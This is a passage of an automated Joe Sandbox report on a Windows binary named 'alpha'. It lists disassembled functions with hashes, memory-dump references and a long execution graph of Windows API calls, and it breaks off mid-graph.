                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpswscanf
                                                                                                                    • String ID: :EOF
                                                                                                                    • API String ID: 1534968528-551370653
                                                                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction ID: 90a07ccb2dcd07cebf43d4d04d71ce76afb848d206f64974b86aacceafbfb006
                                                                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction Fuzzy Hash: 5431A271A0D64A8AFB54BF55E4842B8FAB0FF45F62FE44031DA4D06290DF2CE942C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmp
                                                                                                                    • String ID: /-Y
                                                                                                                    • API String ID: 1886669725-4274875248
                                                                                                                    • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                    • Instruction ID: 46c45cdd6ba39034870d6d22d6afa89cfbf3861329f2d0e2806c467a2c18532c
                                                                                                                    • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                    • Instruction Fuzzy Hash: DF218166E0875981EA50AF02954027DFEB0BB44FD6FE58031DE9C17794EE3CE482E320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 3$3
                                                                                                                    • API String ID: 0-2538865259
                                                                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction ID: 74c151d912120985f0b44087bde21283383c215998ff22fdaf03a9ee2c543326
                                                                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction Fuzzy Hash: 46013931D0A58A8AF394BF61D888278FA70BF80B27FF40135D40E015A2DF2E6585CA60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617791916-0
                                                                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction ID: 359634feeda40882ccdad0a3af20f993fbffb9be1b8cb8178b33350d32e73de3
                                                                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction Fuzzy Hash: 00413972A0968686EA55AF21E448179FBB0FF85F82FE48134DA4E07794DF3DE540CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:5.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1783
                                                                                                                    Total number of Limit Nodes:42
                                                                                                                    execution_graph 16806 7ff789bc6be0 16857 7ff789bccd90 16806->16857 16809 7ff789be41a2 16812 7ff789bc3278 166 API calls 16809->16812 16810 7ff789bc6c13 _pipe 16814 7ff789bc6c32 16810->16814 16843 7ff789bc6e26 16810->16843 16813 7ff789be41bc 16812->16813 16815 7ff789bee91c 198 API calls 16813->16815 16816 7ff789bc6df1 16814->16816 16863 7ff789bcaffc _dup 16814->16863 16817 7ff789be41c1 16815->16817 16820 7ff789bc3278 166 API calls 16817->16820 16819 7ff789bc6c7d 16819->16809 16865 7ff789bcb038 _dup2 16819->16865 16821 7ff789be41d2 16820->16821 16823 7ff789bee91c 198 API calls 16821->16823 16825 7ff789be41d7 16823->16825 16824 7ff789bc6c93 16824->16825 16867 7ff789bcd208 16824->16867 16826 7ff789bc3278 166 API calls 16825->16826 16828 7ff789be41e4 16826->16828 16830 7ff789bee91c 198 API calls 16828->16830 16829 7ff789bc6ca4 16871 7ff789bcbe00 16829->16871 16831 7ff789be41e9 16830->16831 16834 7ff789bc6ccf _get_osfhandle DuplicateHandle 16835 7ff789bc6d07 16834->16835 16836 7ff789bcb038 _dup2 16835->16836 16837 7ff789bc6d11 16836->16837 16837->16825 16838 7ff789bcd208 _close 16837->16838 16839 7ff789bc6d22 16838->16839 16840 7ff789bc6e21 16839->16840 16842 7ff789bcaffc _dup 16839->16842 16909 7ff789bee91c 16840->16909 16844 7ff789bc6d57 16842->16844 16912 7ff789bc3278 16843->16912 16844->16817 16845 7ff789bcb038 _dup2 16844->16845 16846 7ff789bc6d6c 16845->16846 16846->16825 16847 7ff789bcd208 _close 16846->16847 16848 7ff789bc6d7c 16847->16848 16849 7ff789bcbe00 647 API calls 16848->16849 16850 7ff789bc6d9c 16849->16850 16851 7ff789bcb038 _dup2 16850->16851 16852 7ff789bc6da8 16851->16852 16852->16825 16853 7ff789bcd208 _close 16852->16853 16854 7ff789bc6db9 16853->16854 16854->16840 16855 7ff789bc6dc1 16854->16855 16855->16816 16905 7ff789bc6e60 16855->16905 16858 7ff789bccda1 GetProcessHeap RtlAllocateHeap 16857->16858 16859 7ff789bdc84e 16857->16859 16858->16859 16860 7ff789bc6c04 16858->16860 16861 7ff789bc3278 164 API calls 16859->16861 16860->16809 16860->16810 16862 7ff789bdc858 16861->16862 16864 7ff789bcb018 16863->16864 16864->16819 16866 7ff789bcb061 16865->16866 16866->16824 16868 7ff789bcd211 16867->16868 16870 7ff789bcd246 16867->16870 16869 7ff789bcd238 _close 16868->16869 16868->16870 16869->16870 16870->16829 16872 7ff789bc6cc4 16871->16872 16873 7ff789bcbe1b 16871->16873 16872->16834 16872->16835 16873->16872 16874 7ff789bcbe67 16873->16874 16875 7ff789bcbe47 memset 16873->16875 16877 7ff789bcbe73 16874->16877 16878 7ff789bcbf29 16874->16878 16895 7ff789bcbeaf 16874->16895 16988 7ff789bcbff0 16875->16988 16879 7ff789bcbe92 16877->16879 16883 7ff789bcbf0c 16877->16883 16880 7ff789bccd90 166 API calls 16878->16880 16881 7ff789bcbea1 16879->16881 16915 7ff789bcc620 GetConsoleTitleW 16879->16915 16887 7ff789bcbf33 16880->16887 16881->16895 17026 7ff789bcaf98 16881->17026 17031 7ff789bcb0d8 memset 16883->17031 16885 7ff789bcbff0 185 API calls 16885->16872 16888 7ff789bcbf70 16887->16888 16887->16895 17091 7ff789bc88a8 16887->17091 16899 7ff789bcbf75 16888->16899 17148 7ff789bc71ec 16888->17148 16889 7ff789bcbf1e 16889->16895 16892 7ff789bcbfa9 16892->16895 16896 7ff789bccd90 166 API calls 16892->16896 16895->16872 16895->16885 16898 7ff789bcbfbb 16896->16898 16898->16895 17154 7ff789bd081c GetEnvironmentVariableW 16898->17154 16901 7ff789bcb0d8 194 API calls 16899->16901 16902 7ff789bcbf7f 16901->16902 16902->16895 16959 7ff789bd5ad8 16902->16959 16907 7ff789bc6e6d 16905->16907 16906 7ff789bc6eb9 16906->16816 16907->16906 16908 7ff789bd5cb4 7 API calls 16907->16908 16908->16907 16910 7ff789bee9b4 197 API calls 16909->16910 16911 7ff789bee925 longjmp 16910->16911 16913 7ff789bc32b0 166 API calls 16912->16913 16914 7ff789bc32a4 16913->16914 16914->16809 16916 7ff789bcca2f 16915->16916 16918 7ff789bcc675 16915->16918 16917 7ff789bdc5fc GetLastError 16916->16917 16920 7ff789bc3278 166 API calls 16916->16920 16921 7ff789bd855c ??_V@YAXPEAX 16916->16921 16917->16916 17175 7ff789bcca40 16918->17175 16920->16916 16921->16916 16922 7ff789bd291c 8 API calls 16946 7ff789bcc762 16922->16946 16923 7ff789bcc9b5 16925 7ff789bd855c ??_V@YAXPEAX 16923->16925 16924 7ff789bd855c ??_V@YAXPEAX 16924->16946 16927 7ff789bcc855 16925->16927 16926 7ff789bcc978 towupper 16951 7ff789bcc964 16926->16951 16931 7ff789bcc872 16927->16931 16935 7ff789bdc6b8 SetConsoleTitleW 16927->16935 16928 7ff789bcc69b 16928->16916 16928->16923 16928->16946 17186 7ff789bcd3f0 16928->17186 17238 7ff789bd855c 16931->17238 16933 7ff789bcc74d 16933->16946 17214 7ff789bcbd38 16933->17214 16935->16931 16937 7ff789bcc8b5 wcsncmp 16937->16933 16937->16946 16940 7ff789bcc83d 17222 7ff789bccb40 16940->17222 16943 7ff789bcc78a wcschr 16943->16946 16945 7ff789bcca25 16948 7ff789bc3278 166 API calls 16945->16948 16946->16916 16946->16922 16946->16924 16946->16940 16946->16943 16946->16945 16949 7ff789bdc684 16946->16949 16946->16951 16952 7ff789bcca2a 16946->16952 16948->16916 16950 7ff789bc3278 166 API calls 16949->16950 16950->16916 16951->16917 16951->16923 16951->16926 16951->16946 16953 7ff789bc89c0 23 API calls 16951->16953 16955 7ff789bcca16 GetLastError 16951->16955 17254 7ff789beec14 memset 16951->17254 17249 7ff789bd9158 RtlCaptureContext RtlLookupFunctionEntry 16952->17249 16953->16951 16957 7ff789bc3278 166 API calls 16955->16957 16958 7ff789bdc675 16957->16958 16958->16916 16960 7ff789bccd90 166 API calls 16959->16960 16961 7ff789bd5b12 16960->16961 16962 7ff789bccb40 166 API calls 16961->16962 16987 7ff789bd5b8b 16961->16987 16964 7ff789bd5b26 16962->16964 16963 7ff789bd8f80 7 API calls 16965 7ff789bcbf99 16963->16965 16966 7ff789bd0a6c 273 API calls 16964->16966 16964->16987 16965->16881 16967 7ff789bd5b43 16966->16967 16968 7ff789bd5bb8 16967->16968 16969 7ff789bd5b48 GetConsoleTitleW 16967->16969 16970 7ff789bd5bf4 16968->16970 16971 7ff789bd5bbd GetConsoleTitleW 16968->16971 16972 7ff789bccad4 172 API calls 16969->16972 16973 7ff789bdf452 16970->16973 16974 7ff789bd5bfd 16970->16974 16976 7ff789bccad4 172 API calls 16971->16976 16975 7ff789bd5b66 16972->16975 16978 7ff789bd3c24 166 API calls 16973->16978 16980 7ff789bdf462 16974->16980 16981 7ff789bd5c1b 16974->16981 16974->16987 17585 7ff789bd4224 InitializeProcThreadAttributeList 16975->17585 16979 7ff789bd5bdb 16976->16979 16978->16987 17645 7ff789bc96e8 16979->17645 16985 7ff789bc3278 166 API calls 16980->16985 16984 7ff789bc3278 166 API calls 16981->16984 16982 7ff789bd5b7f 16986 7ff789bd5c3c SetConsoleTitleW 16982->16986 16984->16987 16985->16987 16986->16987 16987->16963 16989 7ff789bcc01c 16988->16989 17008 7ff789bcc0c4 16988->17008 16990 7ff789bcc086 16989->16990 16991 7ff789bcc022 16989->16991 16993 7ff789bcc144 16990->16993 16997 7ff789bcc094 16990->16997 16992 7ff789bcc030 16991->16992 16995 7ff789bcc113 16991->16995 16994 7ff789bcc039 wcschr 16992->16994 17020 7ff789bcc053 16992->17020 16996 7ff789bcc151 16993->16996 17017 7ff789bcc1c8 16993->17017 16998 7ff789bcc301 16994->16998 16994->17020 17001 7ff789bcff70 2 API calls 16995->17001 16995->17020 18626 7ff789bcc460 16996->18626 17004 7ff789bcc460 183 API calls 16997->17004 16997->17008 17002 7ff789bccd90 166 API calls 16998->17002 16999 7ff789bcc0c6 17005 7ff789bcc0cf wcschr 16999->17005 17012 7ff789bcc073 16999->17012 17000 7ff789bcc058 17010 7ff789bcff70 2 API calls 17000->17010 17000->17012 17001->17020 17025 7ff789bcc30b 17002->17025 17004->16997 17007 7ff789bcc1be 17005->17007 17005->17012 17009 7ff789bccd90 166 API calls 17007->17009 17008->16874 17009->17017 17010->17012 17011 7ff789bcc460 183 API calls 17011->17008 17012->17008 17013 7ff789bcc460 183 API calls 17012->17013 17013->17012 17014 7ff789bcc211 17019 7ff789bcff70 2 API calls 17014->17019 17015 7ff789bcc285 17015->17014 17021 7ff789bcb6b0 170 API calls 17015->17021 17016 7ff789bcb6b0 170 API calls 17016->17020 17017->17008 17017->17014 17017->17015 17022 7ff789bcd840 178 API calls 17017->17022 17018 7ff789bcd840 178 API calls 17018->17025 17019->17008 17020->16999 17020->17000 17020->17014 17023 7ff789bcc2ac 17021->17023 17022->17017 17023->17012 17023->17014 17024 7ff789bcc3d4 17024->17012 17024->17014 17024->17016 17025->17008 17025->17014 17025->17018 17025->17024 17028 7ff789bcafb1 17026->17028 17027 7ff789bcafdb 17027->16895 17028->17027 17029 7ff789bcb038 _dup2 17028->17029 17030 7ff789bcd208 _close 17028->17030 17029->17028 17030->17028 17032 7ff789bcca40 17 API calls 17031->17032 17048 7ff789bcb162 17032->17048 17033 7ff789bcb2e1 17034 7ff789bcb303 17033->17034 17035 7ff789bcb2f7 ??_V@YAXPEAX 17033->17035 17037 7ff789bd8f80 7 API calls 17034->17037 17035->17034 17036 7ff789bcb1d9 17040 7ff789bccd90 166 API calls 17036->17040 17056 7ff789bcb1ed 17036->17056 17039 7ff789bcb315 17037->17039 17038 7ff789bd1ea0 8 API calls 17038->17048 17039->16879 17039->16889 17040->17056 17042 7ff789bdbfef _get_osfhandle SetFilePointer 17044 7ff789bdc01d 17042->17044 17042->17056 17043 7ff789bcb228 _get_osfhandle 17046 7ff789bcb23f _get_osfhandle 17043->17046 17043->17056 17047 7ff789bd33f0 _vsnwprintf 17044->17047 17045 7ff789bcaffc _dup 17045->17056 17046->17056 17050 7ff789bdc038 17047->17050 17048->17033 17048->17036 17048->17038 17048->17048 17049 7ff789bd01b8 6 API calls 17049->17056 17055 7ff789bc3278 166 API calls 17050->17055 17051 7ff789bdc1c3 17052 7ff789bd33f0 _vsnwprintf 17051->17052 17052->17050 17053 7ff789bcd208 _close 17053->17056 17054 7ff789bd26e0 19 API calls 17054->17056 17057 7ff789bdc1f9 17055->17057 17056->17033 17056->17042 17056->17043 17056->17045 17056->17049 17056->17051 17056->17053 17056->17054 17058 7ff789bdc060 17056->17058 17060 7ff789bcb038 _dup2 17056->17060 17061 7ff789bdc246 17056->17061 17066 7ff789bcb356 17056->17066 17090 7ff789bdc1a5 17056->17090 18640 7ff789bef318 _get_osfhandle GetFileType 17056->18640 17059 7ff789bcaf98 2 API calls 17057->17059 17058->17061 17064 7ff789bd09f4 2 API calls 17058->17064 17059->17033 17060->17056 17062 7ff789bcaf98 2 API calls 17061->17062 17065 7ff789bdc24b 17062->17065 17063 7ff789bcb038 _dup2 17067 7ff789bdc1b7 17063->17067 17068 7ff789bdc084 17064->17068 17069 7ff789bef1d8 166 API calls 17065->17069 17074 7ff789bcaf98 2 API calls 17066->17074 17070 7ff789bdc1be 17067->17070 17071 7ff789bdc207 17067->17071 17072 7ff789bcb900 166 API calls 17068->17072 17069->17033 17075 7ff789bcd208 _close 17070->17075 17073 7ff789bcd208 _close 17071->17073 17076 7ff789bdc08c 17072->17076 17073->17066 17078 7ff789bdc211 17074->17078 17075->17051 17077 7ff789bdc094 wcsrchr 17076->17077 17081 7ff789bdc0ad 17076->17081 17077->17081 17079 7ff789bd33f0 _vsnwprintf 17078->17079 17080 7ff789bdc22c 17079->17080 17082 7ff789bc3278 166 API calls 17080->17082 17081->17081 17084 7ff789bdc0e0 _wcsnicmp 17081->17084 17087 7ff789bdc106 17081->17087 17082->17033 17083 7ff789bcff70 2 API calls 17085 7ff789bdc13b 17083->17085 17084->17081 17085->17061 17086 7ff789bdc146 SearchPathW 17085->17086 17086->17061 17088 7ff789bdc188 17086->17088 17087->17083 17089 7ff789bd26e0 19 API calls 17088->17089 17089->17090 17090->17063 17092 7ff789bc88fc 17091->17092 17094 7ff789bc88cf 17091->17094 17092->16888 17095 7ff789bd0a6c 17092->17095 17093 7ff789bc88df _wcsicmp 17093->17094 17094->17092 17094->17093 17096 7ff789bd1ea0 8 API calls 17095->17096 17097 7ff789bd0ab9 17096->17097 17098 7ff789bd0b12 memset 17097->17098 17099 7ff789bd0aee _wcsnicmp 17097->17099 17100 7ff789bdd927 17097->17100 17102 7ff789bd128f ??_V@YAXPEAX 17097->17102 17101 7ff789bcca40 17 API calls 17098->17101 17099->17098 17099->17100 17104 7ff789bd081c 166 API calls 17100->17104 17103 7ff789bd0b5a 17101->17103 17106 7ff789bcb364 17 API calls 17103->17106 17118 7ff789bdd94e 17103->17118 17105 7ff789bdd933 17104->17105 17105->17098 17105->17102 17107 7ff789bd0b6f 17106->17107 17107->17102 17109 7ff789bd0b8c wcschr 17107->17109 17113 7ff789bd0c0f wcsrchr 17107->17113 17116 7ff789bd081c 166 API calls 17107->17116 17107->17118 17122 7ff789bcd3f0 223 API calls 17107->17122 17123 7ff789bd3060 171 API calls 17107->17123 17125 7ff789bd0d71 wcsrchr 17107->17125 17127 7ff789bccd90 166 API calls 17107->17127 17128 7ff789bd1ea0 8 API calls 17107->17128 17130 7ff789bd0fb1 wcsrchr 17107->17130 17131 7ff789bd2eb4 22 API calls 17107->17131 17132 7ff789bd0fd0 wcschr 17107->17132 17135 7ff789bd10fd wcsrchr 17107->17135 17144 7ff789bd1087 _wcsicmp 17107->17144 17146 7ff789bdda74 17107->17146 18641 7ff789bd3bac 17107->18641 18645 7ff789bd291c GetDriveTypeW 17107->18645 18648 7ff789bd2efc 17107->18648 18662 7ff789bcaf74 17107->18662 17108 7ff789bdd96b ??_V@YAXPEAX 17108->17118 17109->17107 17112 7ff789bdd99a wcschr 17112->17118 17113->17107 17113->17118 17114 7ff789bdda64 17115 7ff789bdd9ca GetFileAttributesW 17115->17114 17115->17118 17116->17107 17117 7ff789bdda90 GetFileAttributesW 17117->17118 17119 7ff789bddaa8 GetLastError 17117->17119 17118->17108 17118->17112 17118->17114 17118->17115 17120 7ff789bdd9fd ??_V@YAXPEAX 17118->17120 17119->17114 17121 7ff789bddab9 17119->17121 17120->17118 17121->17118 17122->17107 17123->17107 17125->17107 17126 7ff789bd0d97 NeedCurrentDirectoryForExePathW 17125->17126 17126->17107 17126->17118 17127->17107 17128->17107 17130->17107 17130->17132 17131->17107 17132->17114 17133 7ff789bd0fed wcschr 17132->17133 17133->17107 17133->17114 17135->17107 17136 7ff789bd111a _wcsicmp 17135->17136 17137 7ff789bd123d 17136->17137 17138 7ff789bd1138 _wcsicmp 17136->17138 17140 7ff789bd1250 ??_V@YAXPEAX 17137->17140 17141 7ff789bd1175 17137->17141 17138->17137 17139 7ff789bd10c5 17138->17139 17139->17141 17142 7ff789bd1169 ??_V@YAXPEAX 17139->17142 17140->17141 17143 7ff789bd8f80 7 API calls 17141->17143 17142->17141 17145 7ff789bd1189 17143->17145 17144->17146 17147 7ff789bd10a7 _wcsicmp 17144->17147 17145->16888 17146->17114 17146->17117 17147->17139 17147->17146 17149 7ff789bc7279 17148->17149 17150 7ff789bc7211 _setjmp 17148->17150 17149->16892 17150->17149 17152 7ff789bc7265 17150->17152 18681 7ff789bc72b0 17152->18681 17155 7ff789bd085e 17154->17155 17156 7ff789bd0877 17154->17156 17155->16899 17157 7ff789bd0884 _wcsicmp 17156->17157 17158 7ff789bd0970 17156->17158 17159 7ff789bd08a2 _wcsicmp 17157->17159 17168 7ff789bd0989 17157->17168 17162 7ff789bd3140 154 API calls 17158->17162 17161 7ff789bd08c0 _wcsicmp 17159->17161 17159->17168 17160 7ff789bd417c 154 API calls 17160->17168 17163 7ff789bd08de _wcsicmp 17161->17163 17161->17168 17162->17168 17164 7ff789bdd8d3 GetCommandLineW 17163->17164 17165 7ff789bd08fc _wcsicmp 17163->17165 17172 7ff789bdd8e5 rand 17164->17172 17167 7ff789bd091a _wcsicmp 17165->17167 17165->17168 17166 7ff789bd33f0 _vsnwprintf 17166->17168 17167->17158 17169 7ff789bd0934 _wcsicmp 17167->17169 17168->17160 17168->17166 17170 7ff789bc6ee4 154 API calls 17168->17170 17171 7ff789bd9158 7 API calls 17168->17171 17169->17172 17173 7ff789bd0952 _wcsicmp 17169->17173 17170->17168 17171->17168 17172->17168 17173->17158 17174 7ff789bdd8f9 GetNumaHighestNodeNumber 17173->17174 17174->17168 17176 7ff789bccab8 17175->17176 17177 7ff789bcca59 17175->17177 17176->16928 17275 7ff789bd9324 17177->17275 17180 7ff789bcca84 17183 7ff789bdc706 ??_V@YAXPEAX 17180->17183 17184 7ff789bcca9b memset 17180->17184 17181 7ff789bdc6e0 17279 7ff789be6d1c 17181->17279 17184->17176 17187 7ff789bcd810 17186->17187 17188 7ff789bcd420 17186->17188 17349 7ff789bcb998 17187->17349 17191 7ff789bdcaad 17188->17191 17192 7ff789bcd46e GetProcessHeap HeapAlloc 17188->17192 17190 7ff789bcd515 17198 7ff789bcd544 17190->17198 17194 7ff789bc3278 166 API calls 17191->17194 17192->17191 17193 7ff789bcd49a 17192->17193 17193->17190 17193->17198 17199 7ff789bcd4e8 wcschr 17193->17199 17195 7ff789bdcab7 17194->17195 17196 7ff789bee91c 198 API calls 17196->17198 17197 7ff789bd9158 7 API calls 17197->17198 17198->17191 17198->17196 17198->17197 17200 7ff789bdca31 wcschr 17198->17200 17201 7ff789bcd5ee GetProcessHeap HeapReAlloc 17198->17201 17202 7ff789bcd54a iswspace 17198->17202 17203 7ff789bcd6ff iswspace 17198->17203 17206 7ff789bcd586 wcschr 17198->17206 17208 7ff789bcd668 17198->17208 17209 7ff789bcd759 wcschr 17198->17209 17211 7ff789bcd6c5 wcschr 17198->17211 17212 7ff789bdca5a wcschr 17198->17212 17199->17193 17200->17198 17201->17191 17204 7ff789bcd61d GetProcessHeap HeapSize 17201->17204 17202->17198 17205 7ff789bcd561 wcschr 17202->17205 17203->17198 17207 7ff789bcd712 wcschr 17203->17207 17204->17198 17205->17198 17206->17198 17207->17198 17210 7ff789bd8f80 7 API calls 17208->17210 17209->17198 17213 7ff789bcc741 17210->17213 17211->17198 17212->17198 17213->16933 17213->16937 17215 7ff789bcbd6f 17214->17215 17219 7ff789bcbda2 17214->17219 17215->17219 17378 7ff789beeaf0 17215->17378 17217 7ff789bdc4ab 17217->17219 17383 7ff789bc3240 17217->17383 17219->16946 17220 7ff789bdc4bc 17220->17219 17221 7ff789bc3240 166 API calls 17220->17221 17221->17220 17223 7ff789bccb63 17222->17223 17224 7ff789bccd90 166 API calls 17223->17224 17225 7ff789bcc848 17224->17225 17225->16927 17226 7ff789bccad4 17225->17226 17227 7ff789bccad9 17226->17227 17235 7ff789bccb05 17226->17235 17228 7ff789bccd90 166 API calls 17227->17228 17227->17235 17229 7ff789bdc722 17228->17229 17230 7ff789bdc72e GetConsoleTitleW 17229->17230 17229->17235 17231 7ff789bdc74a 17230->17231 17230->17235 17576 7ff789bcb6b0 17231->17576 17233 7ff789bdc7ec 17234 7ff789bcff70 2 API calls 17233->17234 17234->17235 17235->16927 17236 7ff789bdc7dd SetConsoleTitleW 17236->17233 17237 7ff789bdc778 17237->17233 17237->17236 17239 7ff789bd8574 ??_V@YAXPEAX 17238->17239 17240 7ff789bcc87c 17238->17240 17239->17240 17241 7ff789bd8f80 17240->17241 17244 7ff789bd8f89 17241->17244 17242 7ff789bd8fe0 RtlCaptureContext RtlLookupFunctionEntry 17245 7ff789bd9025 RtlVirtualUnwind 17242->17245 17246 7ff789bd9067 17242->17246 17243 7ff789bcc88e 17243->16881 17244->17242 17244->17243 17245->17246 17583 7ff789bd8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17246->17583 17250 7ff789bd9195 RtlVirtualUnwind 17249->17250 17251 7ff789bd91d7 17249->17251 17250->17251 17584 7ff789bd8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17251->17584 17255 7ff789bcca40 17 API calls 17254->17255 17256 7ff789beec96 17255->17256 17257 7ff789beedf7 17256->17257 17260 7ff789bd081c 166 API calls 17256->17260 17258 7ff789beee16 17257->17258 17259 7ff789beee0a ??_V@YAXPEAX 17257->17259 17261 7ff789bd8f80 7 API calls 17258->17261 17259->17258 17262 7ff789beecca 17260->17262 17265 7ff789beee25 17261->17265 17263 7ff789beecd2 SetCurrentDirectoryW 17262->17263 17264 7ff789beecfb 17262->17264 17266 7ff789beedd4 17263->17266 17267 7ff789beece9 SetErrorMode 17263->17267 17268 7ff789bd498c 8 API calls 17264->17268 17265->16946 17270 7ff789bd417c 166 API calls 17266->17270 17267->17264 17269 7ff789beed89 SetCurrentDirectoryW 17268->17269 17271 7ff789beedc1 17269->17271 17272 7ff789beedac GetLastError 17269->17272 17270->17257 17271->17266 17274 7ff789beedc6 SetErrorMode 17271->17274 17273 7ff789bc3278 166 API calls 17272->17273 17273->17271 17274->17266 17276 7ff789bd9330 17275->17276 17282 